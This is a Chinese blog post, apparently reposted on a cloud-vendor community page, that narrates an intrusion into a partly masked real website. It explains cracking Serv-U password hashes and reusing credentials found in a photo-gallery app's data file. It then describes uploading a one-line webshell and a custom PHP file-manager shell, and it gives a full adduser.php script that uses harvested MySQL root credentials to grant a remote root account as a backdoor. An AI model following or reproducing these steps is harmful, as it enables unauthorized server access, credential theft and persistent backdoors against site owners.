Php脚本注射检测后的再次提权

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云数据库 RDS MySQL,高可用系列 2核4GB
简介: 方法一:爆破法.      最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.
方法一:爆破法.
     最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用记事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用"password_mingwen"表示,密文密码也就是 我们在ServUDaemon.ini中看到的密码(34位),用"password_miwen"表示,密文的前两位合并上明文,然后经MD5加密后正 好等于密文的后三十二位!】

     即:md5(password_mingwen+left(password_miwen,2)=right (password_miwen,32)俗话说的好啊,"工欲善其事,必先利其器"在网上找了两上绝配的工具!一个是MD5CrackSpV2.3(速度 增强版,一个非常好用的MD5爆破工具),另一个是字典专家.BBSt,利用它我们可以生成前两位为我们指定字母的字典!!MD5CrackSpV2.3 速度奇快,我们可以指定开的线程数,我在P4,256M内存环境下做了一个测试,利用字典专家.BBSt生成一个含3亿条记录,1.2G左右的字典, 用MD5CrackSpV2.3开8线程跑,总共用了30分钟!一个线程一秒钟跑大约2万条记录,8个线程一秒钟,就是16万条记录!!照此计算一台机器 一天就能跑约138亿条记录!假如有十台P4连合作业,威力无穷啊!同时在网上看到消息说山东大学已经研究出来了破解MD5的算法!但是没有找到具体的程序,程序一旦出世,密而不密,恐怕很多网站又要遭殃了!!

     方法二:程序法.

     不要在一棵树上吊死,一边挂着字典爆破,一边看看还有没有别的途径,双 管齐下吗,要不闲着也是闲着(哈哈)!在c:/Program Files/Serv-U/ServUDaemon.ini文件中共有十多位用户,其中有一个的用户目录:"d:/s***n/a***lover/ photo/gallery" 吸引了我。立即在浏览器中打上http://www.*****.net/ a***lover/photo/gallery 出现如下提示:"This Virtual Directory does not allow contents to be listed",在试试它的上一级目录看看:http://www.*****.net/ a***lover/photo/真是山重水复疑无路,柳暗花明又一村啊!原来在机子里还藏着个某某网络相册.

    首先注册个用户进去看看,有图片上传功能 啊,抓包看看是否存在有类似动网UPFILE的漏洞,用NC提交后失败了,上传类型还是图片文件,又是那句话:"此路不通"。利用CASI查看http: //www.*****.net/ a***lover/photo/index.php的文件内容得知:程序中文名称:文本图片管理程序 程序英文名称:NEATPIC 版本:2.0.13 BETA,老规矩先到网上下个研究研究在说。经过分析目录结构发现在:database/user.php文件用于存放用户名密码等注册信息!用CASI 打开:http://www.*****.net/ a***lover/photo/database/user.php显示无文件内容!难道是默认目录不对?!管理员把目录改了!!看配置文件: http://www.*****.net/ a***lover/photo/inc/config.inc.php发现:

// 参数设置
//*********************************
$DataDir = "database678"; //杂项数据存放目录
$CatDir = "second"; //二级分类数据存放目录
$SortDir = "main"; //分类数据文件存放目录
$PicRecordDir = "picdata"; //图片数据总目录
$PicDir = "pic"; //图片文件存放目录
$SPicDir = "spic"; //缩略图存放目录
$CommentDir = "comment"; //图片评论目录
$UserDat = "user.php"; //用户数据文件
$Dat = "dat.php"; //相册数据文件

果然管理员把默认的database目录改成了database678了!现在可以用CASI查看user.php的内容了如下图:

 

 


   面的哪一行即ID=1的为管理员的注册信息,第一个为用户名,第二个为密码。发现该用户名与ServUDaemon.ini中的相同,密码会不会也相同呢? (很多人都有使用同一密码的习惯!!)打开DOS窗口-->登录FTP-->输入用户名和密码,成功了,终于成功了!揪出这个密码可真不容易 啊!!这时字典还在哪挂着来,要跑出这个8位纯字母的密码也要费一段时间啊!!

一、 上传PHPSHELL,控制MYSQL数据库

    通过 ServUDaemon.ini文件中的Access1=D:/s***n/ a***lover/photo/gallery |RWAMLCDP知道该用户具有:读取(R),写入(W),追加(A)等功能,唯独缺少了"执行(E)"功能!利用PUT命令上传一个一句话的 WebShell上去.在浏览器中运行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出现:
Warning: passthru(): Unable to fork [dir] in D:/s***n/a***lover/photo/gallery/webshell.php on line 1
看 来外部命令不能执行,管理员一定作了相应设置.再上传一个phpinfo.php文件 在浏览器中运行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,这时在php.ini变量的设置都显示出来了(当然也你可以利用CASI看 c:/windows/php.ini 的内容)!外部命令不能执行的原因在此:
以下是引用片段:
safe_mode
Off
Off

safe_mode_exec_dir
no value
no value

safe_mode_gid
Off
Off

safe_mode_include_dir
no value
no value
 


    接下来上传一个自己编的仅带有浏览,拷贝,重命名,删除文件和上传文件五个功能的PHPSHELL:CMD.PHP

    注: 由于时间仓促代码界面没优化好,在dir文本框中输入要浏览的目录名称;copy文本框中,上面输入源文件如d:/web/cmd.php,下面输入目标 文件如d:/web/cmdbak.php;del文本框中输入要删除的文件名如:d:/web/cmdbak.php;ren命令与copy命令相似; 点浏览按钮,选择你要上传的文件,然后点upload按钮,就上传到与本SHELL相同的目录下了.

    运行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盘,C:/windows,以及C:/Program Files下的内容,而且对D盘还有写权限!在通过copy命令把想下载的软件考到WEB目录下下载下来了^_^

    如何才能把文件写到只读的C盘上呢?这就要通过MYSQL了!但是MYSQL没有远程连接啊!没有条件创造条件,看文章系统的配置文件config.inc.php的内容了吗?
$dbhost="localhost";//数据库主机名
$dbuser="root";//数据库用户名
$dbpass="******";//数据库密码
$dbname="article";//数据库名

    数据库用户名和密码都知道了,可惜的是本地用户,然而我们能不能通过本地有最高权限用户root来添加个远程用户呢?答案是肯定的。

    为此专门写了个程序adduser.php利用已知的有ROOT权限的帐号添写加远程ROOT权限的帐号,内容如下:

以下是代码片段:
$dbh=mysql_connect('localhost:3306','root','*****');//
echo mysql_errno().": ".mysql_error()."
";
mysql_select_db('mysql');
echo mysql_errno().": ".mysql_error()."
";
$query="GRANT ALL PRIVILEGES ON *.* TO username@'%'IDENTIFIED BY 'password' WITH GRANT OPTION";
$res=mysql_query($query, $dbh);
echo mysql_errno().": ".mysql_error()."
";
$err=mysql_error();
if($err){
echo "ERROR!";
}
else{
echo "ADD USER OK!";
}
?>
 


    利用cmd.php上传adduser.php执行后,就在库中添加了一个远程ROOT帐号,就可以用CASI带的MYSQL连接器连上了!!它可以把MYSQL库关了!!用牛族可方便的浏览表中的记录!!如下图:带%号的用户为添加的远程用户。

 
相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
3月前
|
缓存 监控 算法
分析慢日志文件来优化 PHP 脚本的性能
分析慢日志文件来优化 PHP 脚本的性能
|
5月前
|
运维 中间件 PHP
深入理解PHP中的中间件模式自动化运维之脚本编程实践##
【7月更文挑战第31天】在PHP开发中,中间件模式是一种强大的设计模式,它允许开发者在请求处理流程中注入自定义的处理逻辑。本文将通过实际代码示例来探讨如何在PHP项目中实现和使用中间件,以及这种模式如何提升应用程序的可维护性和扩展性。 【7月更文挑战第31天】 在现代IT运维管理中,自动化不再是可选项,而是提高生产效率、确保服务质量的必需品。本文将通过Python脚本编程的角度,探讨如何利用代码简化日常运维任务,提升工作效率。我们将从实际案例出发,逐步剖析自动化脚本的设计思路、实现过程及其带来的益处。 ##
30 0
|
6月前
|
Ubuntu 关系型数据库 MySQL
ubuntu apt 安装wordpress所需所有的 一键脚本 扩展您的PHP似乎没有安装运行WordPress所必需的MySQL扩展。
ubuntu apt 安装wordpress所需所有的 一键脚本 扩展您的PHP似乎没有安装运行WordPress所必需的MySQL扩展。
91 0
ubuntu apt 安装wordpress所需所有的 一键脚本 扩展您的PHP似乎没有安装运行WordPress所必需的MySQL扩展。
|
7月前
|
应用服务中间件 PHP nginx
php如何实现检测nginx配置的正确性
请确保在执行此操作时,PHP有足够的权限来执行Nginx命令和访问Nginx配置文件。另外,将上述代码嵌入到您的应用程序中时,要注意安全性,以防止潜在的命令注入攻击。
132 3
|
7月前
|
存储 安全 JavaScript
【PHP开发专栏】PHP跨站脚本攻击(XSS)防范
【4月更文挑战第30天】本文探讨了Web开发中的XSS攻击,解释了其原理和分类,包括存储型、反射型和DOM型XSS。XSS攻击可能导致数据泄露、会话劫持、网站破坏、钓鱼攻击和DDoS攻击。防范措施包括输入验证、输出编码、使用HTTP头部、定期更新及使用安全框架。PHP开发者应重视XSS防护,确保应用安全。
186 1
|
7月前
|
缓存 自然语言处理 监控
深入PHP内核:探索高性能脚本编程的秘密
【4月更文挑战第30天】 在现代Web开发中,PHP作为一种流行的服务器端脚本语言,其性能优化一直是开发者关注的焦点。本文将深入探讨PHP内核架构,分析影响PHP脚本性能的关键因素,并提出一系列提升执行效率的策略。我们将从语言解释器的角度出发,剖析词法分析、语法分析和执行机制,同时考虑内存管理和代码优化的实践技巧。通过本文的阅读,读者能够对PHP的性能调优有更深层次的理解,并在实际项目中运用这些知识以实现高效的脚本运行。
|
7月前
|
监控 前端开发 安全
PHP脚本:实现实时监控电脑屏幕并生成网页截图
在当今数字化时代,实时监控和数据收集变得越来越重要。有时候,我们需要监视某些活动,例如员工的工作情况、儿童的网络活动等等。在这篇文章中,我们将探讨如何使用PHP脚本实现实时监控电脑屏幕,并将监控到的数据自动提交到网站。
245 2
|
7月前
|
网络协议 PHP
php案例:判断这个是不是检测 IPv6 地址
php案例:判断这个是不是检测 IPv6 地址
php案例:判断这个是不是检测 IPv6 地址